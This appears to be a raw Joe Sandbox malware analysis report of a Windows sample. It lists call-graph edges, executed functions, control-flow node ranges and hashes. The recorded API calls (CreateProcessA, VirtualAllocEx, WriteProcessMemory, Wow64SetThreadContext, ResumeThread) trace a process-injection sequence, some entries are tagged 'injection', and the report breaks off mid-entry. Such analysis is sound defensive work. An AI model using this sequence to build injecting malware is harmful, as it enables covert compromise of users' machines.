27133->27072 27137 72dcb0d 27136->27137 27139 72da3a9 2 API calls 27137->27139 27140 72da2f8 ResumeThread 27137->27140 27141 72da300 ResumeThread 27137->27141 27138 72dcb33 27138->27072 27139->27138 27140->27138 27141->27138 27144 72da3a9 2 API calls 27142->27144 27212 72da3b0 27142->27212 27143 72dcc1e 27143->27072 27144->27143 27147 72dc893 27146->27147 27148 72dc8d8 27146->27148 27147->27072 27150 72da7c4 CreateProcessA 27148->27150 27151 72da7d0 CreateProcessA 27148->27151 27149 72dc980 27149->27072 27150->27149 27151->27149 27154 72dcc6b 27152->27154 27153 72dd339 27155 72da548 WriteProcessMemory 27154->27155 27156 72da540 WriteProcessMemory 27154->27156 27155->27153 27156->27153 27159 72da548 WriteProcessMemory 27157->27159 27160 72da540 WriteProcessMemory 27157->27160 27158 72dca5d 27158->27072 27159->27158 27160->27158 27216 72dd5a0 27161->27216 27221 72dd5b0 27161->27221 27162 72dca0a 27162->27072 27166 72da859 CreateProcessA 27165->27166 27168 72daa1b 27166->27168 27168->27168 27170 72da859 CreateProcessA 27169->27170 27172 72daa1b 27170->27172 27172->27172 27174 72da33a ResumeThread 27173->27174 27176 72da3ae Wow64SetThreadContext 27173->27176 27177 72da371 27174->27177 27179 72da43d 27176->27179 27177->27113 27179->27113 27181 72da340 ResumeThread 27180->27181 27183 72da371 27181->27183 27183->27113 27185 72da300 ResumeThread 27184->27185 27187 72da371 27185->27187 27187->27113 27189 72da590 WriteProcessMemory 27188->27189 27191 72da5e7 27189->27191 27191->27119 27193 72da590 WriteProcessMemory 27192->27193 27195 72da5e7 27193->27195 27195->27119 27197 72da683 ReadProcessMemory 27196->27197 27199 72da6c7 27197->27199 27199->27128 27201 72da683 ReadProcessMemory 27200->27201 27203 72da6c7 27201->27203 27203->27128 27205 72da4c8 VirtualAllocEx 27204->27205 27207 72da505 27205->27207 27207->27133 27209 72da4c8 VirtualAllocEx 27208->27209 27211 72da505 27209->27211 27211->27133 27213 72da3f5 Wow64SetThreadContext 27212->27213 27215 72da43d 27213->27215 27215->27143 27217 72dd5b0 27216->27217 27219 72da3a9 2 API calls 27217->27219 27220 72da3b0 Wow64SetThreadContext 27217->27220 27218 72dd5db 27218->27162 27219->27218 27220->27218 27222 72dd5c5 27221->27222 27224 72da3a9 2 API calls 27222->27224 27225 72da3b0 Wow64SetThreadContext 27222->27225 27223 72dd5db 27223->27162 27224->27223 27225->27223 26997 72dd668 26998 72dd7f3 26997->26998 27000 72dd68e 26997->27000 27000->26998 27001 72db2f4 27000->27001 27002 72dd8e8 PostMessageW 27001->27002 27003 72dd954 27002->27003 27003->27000 27025 2e7acb0 27026 2e7acbf 27025->27026 27029 2e7ad97 27025->27029 27034 2e7ada8 27025->27034 27030 2e7addc 27029->27030 27031 2e7adb9 27029->27031 27030->27026 27031->27030 27032 2e7afe0 GetModuleHandleW 27031->27032 27033 2e7b00d 27032->27033 27033->27026 27035 2e7addc 27034->27035 27036 2e7adb9 27034->27036 27035->27026 27036->27035 27037 2e7afe0 GetModuleHandleW 27036->27037 27038 2e7b00d 27037->27038 27038->27026 27039 2e7d040 27040 2e7d086 27039->27040 27044 2e7d628 27040->27044 27047 2e7d618 27040->27047 27041 2e7d173 27050 2e7d27c 27044->27050 27048 2e7d656 27047->27048 27049 2e7d27c DuplicateHandle 27047->27049 27048->27041 27049->27048 27051 2e7d690 DuplicateHandle 27050->27051 27052 2e7d656 27051->27052 27052->27041 27004 2e74668 27005 2e7467a 27004->27005 27006 2e74686 27005->27006 27008 2e74779 27005->27008 27009 2e7479d 27008->27009 27013 2e74879 27009->27013 27017 2e74888 27009->27017 27015 2e748af 27013->27015 27014 2e7498c 27014->27014 27015->27014 27021 2e744c4 27015->27021 27019 2e748af 27017->27019 27018 2e7498c 27018->27018 27019->27018 27020 2e744c4 CreateActCtxA 27019->27020 27020->27018 27022 2e75918 CreateActCtxA 27021->27022 27024 2e759cf 27022->27024

                                                                Executed Functions

                                                                Function 072DE418 Relevance: .6, Instructions: 591COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46ba44662d5b0d54a8d08ae5dc9bd278f4588f200ee9ef0a951016a14dd70152
                                                                • Instruction ID: 9039be6e28662b850ff2f1c9e3d6875c4414a5415ae533a36073d2373235f323
                                                                • Opcode Fuzzy Hash: 46ba44662d5b0d54a8d08ae5dc9bd278f4588f200ee9ef0a951016a14dd70152
                                                                • Instruction Fuzzy Hash: 632289B0B112069FDB18DB69C464BAEB7F7AF89700F258469E5469F3A0DB30ED01CB51
                                                                Function 072D3B90 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 509b88a33b46a0c8a9f3d6044a08c1d6c5fa99f221a1d2f505eb24531513e21c
                                                                • Instruction ID: b5416b9c8456d15fbfc0dd26ec22e03b9d005bf9227695b44a9fea6139507cb6
                                                                • Opcode Fuzzy Hash: 509b88a33b46a0c8a9f3d6044a08c1d6c5fa99f221a1d2f505eb24531513e21c
                                                                • Instruction Fuzzy Hash: 7A5103B4E25208CFDB08CFAAC8546EEBBF6AF8A300F249429D419AB355DB705D45CF51
                                                                Function 072DCBDC Relevance: .0, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80b5a0d0fbc690182069db1c328199e1642440c1e9b76a6693f993869263c997
                                                                • Instruction ID: cdd648c79878cf3da89f458e57b31e1775f31d949613799f7c236b7a56e41398
                                                                • Opcode Fuzzy Hash: 80b5a0d0fbc690182069db1c328199e1642440c1e9b76a6693f993869263c997
                                                                • Instruction Fuzzy Hash: 6AD017F8D3D698CFC3909A60A4855F4BBBCA70B301F546096D80AA7202D5F48D82CEA8
                                                                Function 072DA3A9 Relevance: 3.1, APIs: 2, Instructions: 98threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 332 72da3a9-72da3ac 333 72da3ae-72da3fb 332->333 334 72da33a-72da36f ResumeThread 332->334 339 72da3fd-72da409 333->339 340 72da40b-72da43b Wow64SetThreadContext 333->340 341 72da378-72da39d 334->341 342 72da371-72da377 334->342 339->340 346 72da43d-72da443 340->346 347 72da444-72da474 340->347 342->341 346->347
                                                                APIs
                                                                • ResumeThread.KERNELBASE ref: 072DA362
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072DA42E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Thread$ContextResumeWow64
                                                                • String ID:
                                                                • API String ID: 1826235168-0
                                                                • Opcode ID: f97afa2325b961fe43fa11b87ecbc6d66548e165d14c097ccd1a9a025f12e86e
                                                                • Instruction ID: 0498001badccc04d6cadc9df644606a1c2ccb32de663d0d975d0123dfb0a7ad1
                                                                • Opcode Fuzzy Hash: f97afa2325b961fe43fa11b87ecbc6d66548e165d14c097ccd1a9a025f12e86e
                                                                • Instruction Fuzzy Hash: DD3158B1D0030A8FDB20DFAAC485BEEBBF5AF88314F54C429D559A7240CB789945CFA4
                                                                Function 072DA7C4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 352 72da7c4-72da865 354 72da89e-72da8be 352->354 355 72da867-72da871 352->355 360 72da8f7-72da926 354->360 361 72da8c0-72da8ca 354->361 355->354 356 72da873-72da875 355->356 358 72da898-72da89b 356->358 359 72da877-72da881 356->359 358->354 362 72da885-72da894 359->362 363 72da883 359->363 371 72da95f-72daa19 CreateProcessA 360->371 372 72da928-72da932 360->372 361->360 364 72da8cc-72da8ce 361->364 362->362 365 72da896 362->365 363->362 366 72da8f1-72da8f4 364->366 367 72da8d0-72da8da 364->367 365->358 366->360 369 72da8dc 367->369 370 72da8de-72da8ed 367->370 369->370 370->370 373 72da8ef 370->373 383 72daa1b-72daa21 371->383 384 72daa22-72daaa8 371->384 372->371 374 72da934-72da936 372->374 373->366 376 72da959-72da95c 374->376 377 72da938-72da942 374->377 376->371 378 72da944 377->378 379 72da946-72da955 377->379 378->379 379->379 380 72da957 379->380 380->376 383->384 394 72daab8-72daabc 384->394 395 72daaaa-72daaae 384->395 396 72daacc-72daad0 394->396 397 72daabe-72daac2 394->397 395->394 398 72daab0 395->398 400 72daae0-72daae4 396->400 401 72daad2-72daad6 396->401 397->396 399 72daac4 397->399 398->394 399->396 403 72daaf6-72daafd 400->403 404 72daae6-72daaec 400->404 401->400 402 72daad8 401->402 402->400 405 72daaff-72dab0e 403->405 406 72dab14 403->406 404->403 405->406 407 72dab15 406->407 407->407
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072DAA06
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 21fc9023b7b24796c19a785ab5663ab1362d45a868ba0054791e836f9686a0e8
                                                                • Instruction ID: 5c59009406110e5493851f2a4fdae13855a1f79ed6aaf2266e8f35bcca143f5e
                                                                • Opcode Fuzzy Hash: 21fc9023b7b24796c19a785ab5663ab1362d45a868ba0054791e836f9686a0e8
                                                                • Instruction Fuzzy Hash: 8CA13DB1D1135A8FEB24CF68C841BEDBBB2BF48310F158169E859A7240DB749D85CF91
                                                                Function 072DA7D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 409 72da7d0-72da865 411 72da89e-72da8be 409->411 412 72da867-72da871 409->412 417 72da8f7-72da926 411->417 418 72da8c0-72da8ca 411->418 412->411 413 72da873-72da875 412->413 415 72da898-72da89b 413->415 416 72da877-72da881 413->416 415->411 419 72da885-72da894 416->419 420 72da883 416->420 428 72da95f-72daa19 CreateProcessA 417->428 429 72da928-72da932 417->429 418->417 421 72da8cc-72da8ce 418->421 419->419 422 72da896 419->422 420->419 423 72da8f1-72da8f4 421->423 424 72da8d0-72da8da 421->424 422->415 423->417 426 72da8dc 424->426 427 72da8de-72da8ed 424->427 426->427 427->427 430 72da8ef 427->430 440 72daa1b-72daa21 428->440 441 72daa22-72daaa8 428->441 429->428 431 72da934-72da936 429->431 430->423 433 72da959-72da95c 431->433 434 72da938-72da942 431->434 433->428 435 72da944 434->435 436 72da946-72da955 434->436 435->436 436->436 437 72da957 436->437 437->433 440->441 451 72daab8-72daabc 441->451 452 72daaaa-72daaae 441->452 453 72daacc-72daad0 451->453 454 72daabe-72daac2 451->454 452->451 455 72daab0 452->455 457 72daae0-72daae4 453->457 458 72daad2-72daad6 453->458 454->453 456 72daac4 454->456 455->451 456->453 460 72daaf6-72daafd 457->460 461 72daae6-72daaec 457->461 458->457 459 72daad8 458->459 459->457 462 72daaff-72dab0e 460->462 463 72dab14 460->463 461->460 462->463 464 72dab15 463->464 464->464
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072DAA06
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: d93fd65e4fcf7cb3986966bcc3a1cde069e243a5204ae1ef0595affb2cfd424d
                                                                • Instruction ID: e13faa01ea3182713f65175442007a85448a9d41b5cb629947358c33869337fc
                                                                • Opcode Fuzzy Hash: d93fd65e4fcf7cb3986966bcc3a1cde069e243a5204ae1ef0595affb2cfd424d
                                                                • Instruction Fuzzy Hash: 49913AB1D1031A8FEB24CF68C841BEDBBB2BF48310F158269E859A7240DB749D85CF91
                                                                Function 02E7ADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 466 2e7ada8-2e7adb7 467 2e7ade3-2e7ade7 466->467 468 2e7adb9-2e7adc6 call 2e7a0cc 466->468 470 2e7adfb-2e7ae3c 467->470 471 2e7ade9-2e7adf3 467->471 475 2e7addc 468->475 476 2e7adc8 468->476 477 2e7ae3e-2e7ae46 470->477 478 2e7ae49-2e7ae57 470->478 471->470 475->467 522 2e7adce call 2e7b031 476->522 523 2e7adce call 2e7b040 476->523 477->478 479 2e7ae7b-2e7ae7d 478->479 480 2e7ae59-2e7ae5e 478->480 485 2e7ae80-2e7ae87 479->485 482 2e7ae60-2e7ae67 call 2e7a0d8 480->482 483 2e7ae69 480->483 481 2e7add4-2e7add6 481->475 484 2e7af18-2e7afd8 481->484 487 2e7ae6b-2e7ae79 482->487 483->487 517 2e7afe0-2e7b00b GetModuleHandleW 484->517 518 2e7afda-2e7afdd 484->518 488 2e7ae94-2e7ae9b 485->488 489 2e7ae89-2e7ae91 485->489 487->485 490 2e7ae9d-2e7aea5 488->490 491 2e7aea8-2e7aeaa call 2e7a0e8 488->491 489->488 490->491 495 2e7aeaf-2e7aeb1 491->495 497 2e7aeb3-2e7aebb 495->497 498 2e7aebe-2e7aec3 495->498 497->498 499 2e7aec5-2e7aecc 498->499 500 2e7aee1-2e7aeee 498->500 499->500 502 2e7aece-2e7aede call 2e7a0f8 call 2e7a108 499->502 506 2e7af11-2e7af17 500->506 507 2e7aef0-2e7af0e 500->507 502->500 507->506 519 2e7b014-2e7b028 517->519 520 2e7b00d-2e7b013 517->520 518->517 520->519 522->481 523->481
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02E7AFFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 986b96edeca62d84a30ac4ad300e98d63d652229afe7314e88d8513ba5204db8
                                                                • Instruction ID: a3c2d7f3165acf3d12d34d438f54e1f03278e04a4444e4496397a142daa83ca3
                                                                • Opcode Fuzzy Hash: 986b96edeca62d84a30ac4ad300e98d63d652229afe7314e88d8513ba5204db8
                                                                • Instruction Fuzzy Hash: 01811370A00B058FD724DF2AD45579ABBF2FF88208F00892DD49AD7B50DB75E849CB95
                                                                Function 02E744C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 524 2e744c4-2e759d9 CreateActCtxA 527 2e759e2-2e75a3c 524->527 528 2e759db-2e759e1 524->528 535 2e75a3e-2e75a41 527->535 536 2e75a4b-2e75a4f 527->536 528->527 535->536 537 2e75a51-2e75a5d 536->537 538 2e75a60-2e75a90 536->538 537->538 542 2e75a42-2e75a4a 538->542 543 2e75a92-2e75b14 538->543 542->536 546 2e759cf-2e759d9 542->546 546->527 546->528
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 02E759C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 695a838af3ac47017f42bbfce22651784cb3d5e49180a5d45f23f4839980a7eb
                                                                • Instruction ID: 22c183cf1e290eb5e970a24a02d66d459aef92f874004e3c322b642f7980f9fa
                                                                • Opcode Fuzzy Hash: 695a838af3ac47017f42bbfce22651784cb3d5e49180a5d45f23f4839980a7eb
                                                                • Instruction Fuzzy Hash: A741E371C0071DCBEB24DFA9C884B9EBBF5BF49318F60816AD408AB251DB756946CF90
                                                                Function 02E7590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 547 2e7590c-2e759d9 CreateActCtxA 549 2e759e2-2e75a3c 547->549 550 2e759db-2e759e1 547->550 557 2e75a3e-2e75a41 549->557 558 2e75a4b-2e75a4f 549->558 550->549 557->558 559 2e75a51-2e75a5d 558->559 560 2e75a60-2e75a90 558->560 559->560 564 2e75a42-2e75a4a 560->564 565 2e75a92-2e75b14 560->565 564->558 568 2e759cf-2e759d9 564->568 568->549 568->550
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 02E759C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 5abfd9fc3368e1c0264390ef28eb2d4265c84546dcc1f6990182ec3296c8d922
                                                                • Instruction ID: 3d93f942b9fb5f80e279c7df1cddce3e378d50aade3ec54a9ff0ffd95a2991c7
                                                                • Opcode Fuzzy Hash: 5abfd9fc3368e1c0264390ef28eb2d4265c84546dcc1f6990182ec3296c8d922
                                                                • Instruction Fuzzy Hash: 0D41F2B1C0071ACBEB24CFA9C8857CEBBF1BF49314F60816AD408AB250DB755946CF50
                                                                Function 072DD8E1 Relevance: 1.6, APIs: 1, Instructions: 79windowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 569 72dd8e1-72dd8e4 570 72dd877-72dd8b7 569->570 571 72dd8e6-72dd952 PostMessageW 569->571 576 72dd8b9-72dd8bf 570->576 577 72dd8c0-72dd8d4 570->577 574 72dd95b-72dd96f 571->574 575 72dd954-72dd95a 571->575 575->574 576->577
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 072DD945
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID:
                                                                • API String ID: 410705778-0
                                                                • Opcode ID: fcdd79942fb61b728ca2dfb1bc1970a74b4b84fd1787a2208339cb19eec83d93
                                                                • Instruction ID: 66f31c988ec6990b20a74e48988833693171517e433c6136f22f4cddf8a9b256
                                                                • Opcode Fuzzy Hash: fcdd79942fb61b728ca2dfb1bc1970a74b4b84fd1787a2208339cb19eec83d93
                                                                • Instruction Fuzzy Hash: DB3105B59003499FDB10DF9AD885BDEFBF8EB48324F10841AE558A7640C375A944CFA1
                                                                Function 072DA540 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 580 72da540-72da596 582 72da598-72da5a4 580->582 583 72da5a6-72da5e5 WriteProcessMemory 580->583 582->583 585 72da5ee-72da61e 583->585 586 72da5e7-72da5ed 583->586 586->585
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072DA5D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 6ad3c15d27a972a138f7fd573215a269a21bf64af033b22874e85ad37dcc37cf
                                                                • Instruction ID: b7c4eb3a5332314f7de09fe1cebaf2b6e0da494ed47a66d5af299e20a99970b9
                                                                • Opcode Fuzzy Hash: 6ad3c15d27a972a138f7fd573215a269a21bf64af033b22874e85ad37dcc37cf
                                                                • Instruction Fuzzy Hash: 302122B1D1034A9FDB10CFA9C885BEEBBF1BF48310F14882AE959A7241C7799955CB60
                                                                Function 072DA548 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 590 72da548-72da596 592 72da598-72da5a4 590->592 593 72da5a6-72da5e5 WriteProcessMemory 590->593 592->593 595 72da5ee-72da61e 593->595 596 72da5e7-72da5ed 593->596 596->595
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072DA5D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 653cc310605ab3bb1e2bdb116028ff007063a278268b6a729f21560f6c365197
                                                                • Instruction ID: 20bc90049666cb6a3ab7e96a1c53e636a359e2e5a783e2da372b53e74cfcff71
                                                                • Opcode Fuzzy Hash: 653cc310605ab3bb1e2bdb116028ff007063a278268b6a729f21560f6c365197
                                                                • Instruction Fuzzy Hash: B32155B1D103099FDB10CFAAC881BDEBBF5FF48310F10842AE919A7240C778A944CBA0
                                                                Function 072DA630 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 606 72da630-72da6c5 ReadProcessMemory 609 72da6ce-72da6fe 606->609 610 72da6c7-72da6cd 606->610 610->609
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072DA6B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: c03a55414627d720eb1f6acd2872a03b0c172a4478a021dabe5fd06814804759
                                                                • Instruction ID: 14572d9638cba0fa446520930dd6893041c90108b802b62c0b9c825fac361020
                                                                • Opcode Fuzzy Hash: c03a55414627d720eb1f6acd2872a03b0c172a4478a021dabe5fd06814804759
                                                                • Instruction Fuzzy Hash: 9B2126B1D013499FDB10DFA9C881BEEBBF5BF48310F54882EE959A7240C7349905CBA0
                                                                Function 02E7D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 600 2e7d27c-2e7d724 DuplicateHandle 602 2e7d726-2e7d72c 600->602 603 2e7d72d-2e7d74a 600->603 602->603
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E7D656,?,?,?,?,?), ref: 02E7D717
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 470dc44d330b461f74d4b49797926e2b073d6a9c2513b106bf283b31b9ab9c85
                                                                • Instruction ID: c152f1f9194b1c975df3e0220414dc5cdb0dc0ee92b97b97737c5c0e2907f1dd
                                                                • Opcode Fuzzy Hash: 470dc44d330b461f74d4b49797926e2b073d6a9c2513b106bf283b31b9ab9c85
                                                                • Instruction Fuzzy Hash: 072103B5D003489FDB10CF9AD885ADEBBF8FB48314F14801AE918A3310C374A940CFA4
                                                                Function 072DA638 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072DA6B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: c026f367f557546a7ed2c746271a527b1c449fce50454b16feee428a52d4ea2a
                                                                • Instruction ID: c2ee470e24648e29c6b0afcaf79cb41d18171d645d4435c5ce477d8482004a27
                                                                • Opcode Fuzzy Hash: c026f367f557546a7ed2c746271a527b1c449fce50454b16feee428a52d4ea2a
                                                                • Instruction Fuzzy Hash: 742116B1C003499FDB10DFAAC881BDEBBF5FF48310F508429E959A7240C7399941CBA4
                                                                Function 072DA3B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 614 72da3b0-72da3fb 616 72da3fd-72da409 614->616 617 72da40b-72da43b Wow64SetThreadContext 614->617 616->617 619 72da43d-72da443 617->619 620 72da444-72da474 617->620 619->620
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072DA42E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: ec7eb6e65731d63835d46c932f1a836fab9c7d83cdc6f44a7a6d26f1bf682c45
                                                                • Instruction ID: 46ff2a866e71769fb302d42ec12344c97e8a1d640ce84c55b4faa944b75e1d5f
                                                                • Opcode Fuzzy Hash: ec7eb6e65731d63835d46c932f1a836fab9c7d83cdc6f44a7a6d26f1bf682c45
                                                                • Instruction Fuzzy Hash: 922115B1D103098FDB10DFAAC489BAEBBF4EF48324F54C42AD559A7240CB789945CFA5
                                                                Function 02E7D689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E7D656,?,?,?,?,?), ref: 02E7D717
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 48d19b1cbad38b4c281773a2c798414981da7778f208cae1a11d20d86d2a5385
                                                                • Instruction ID: dcca87b7726baf6aa81d0fb0c34f9cae77bd38fe333f498b2a983256d6b98c9e
                                                                • Opcode Fuzzy Hash: 48d19b1cbad38b4c281773a2c798414981da7778f208cae1a11d20d86d2a5385
                                                                • Instruction Fuzzy Hash: C521E3B5D002499FDB10CF99D985ADEBBF5EF48314F14841AE954B3350D374A945CF60
                                                                Function 072DA481 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
